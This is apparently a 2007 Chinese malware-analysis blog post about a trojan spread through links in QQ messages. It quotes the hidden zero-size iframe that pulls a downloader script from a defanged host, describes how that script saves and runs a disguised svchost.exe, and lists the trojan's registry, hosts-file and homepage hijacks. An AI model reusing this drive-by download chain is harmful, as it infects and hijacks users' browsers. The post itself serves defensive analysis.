您的位置:首页 > 编程语言 > VB

01-29/劫持浏览器并弹广告的Trojan.Clicker.VB.ajn正通过QQ信息中的网址传播/第2版

2007-01-28 21:07 351 查看
endurer 原创

2007-01-29 第2版 补充 Kaspersky 的反应
2007-01-28 第1

QQ收到的信息中包含网址:hxxp://hiuz***uo*ai.cn/

hxxp://hiuz***uo*ai.cn/ 的网页中包含代码:
/-------
<IFRAME marginWidth=0 marginHeight=0 src="hxxp://i***v*r.bt***fan.net/xskj.htm" frameBorder=0 width=0 scrolling=no height=0></IFRAME>
-------/

xskj.htm 的内容为Javascrīpt脚本程序,功能是输出使用escape()加密的VBscrīpt脚本程序。
该VBscrīpt脚本程序的功能是:利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 xskj.exe,保存为 %temp%/svchost.exe,然后调用自定义函数yunxingexe(m5,Xskj9)。
自定义函数yunxingexe()的功能是创建Shell.Application 对象XsKjc ,利用 XsKjc 的 ShellExecute 方法 来运行 %temp%/svchost.exe。

xskj.exe 采用 Microsoft Visual Basic 5.0 / 6.0 开发。
/-------
文件说明符 : D:/test/xskj.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 1.00
说明 : SVCH0ST
版权 : SVCH0ST
备注 : SVCH0ST
产品版本 : 1.00
产品名称 : SVCH0ST
公司名称 : SVCH0ST
合法商标 : SVCH0ST
内部名称 : XC0PY
源文件名 : XC0PY.exe
创建时间 : 2007-1-28 20:13:3
修改时间 : 2007-1-28 20:13:4
访问时间 : 2007-1-28 0:0:0
大小 : 40960 字节 40.0 KB
MD5 : 20618f0ff18554c840b74494b5e8594c
-------/

其主要功能是:
/-------
1、在注册表的run键下创建启动项SVCH0ST,实现开机自启动
2、修改hosts文件
3、修改注册表,使IE首页变为:hxxp://i***v*r.bt***fan.net/index.html,并禁止用户通过Internet选项来修改首页
4、弹广告窗口
-------/

瑞星报为:Trojan.Clicker.VB.ajn
瑞星升级报告:19.07.02版新增82个可查杀病毒
来源:瑞星公司 时间:2007-01-22 16:01:05
http://it.rising.com.cn/Channels/Anti_Virus/Upgrade_Report/2007-01-22/1169456324d40068.shtml
列在第59位。

Kaspersky 报为:Trojan.Win32.StartPage.ana
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
相关文章推荐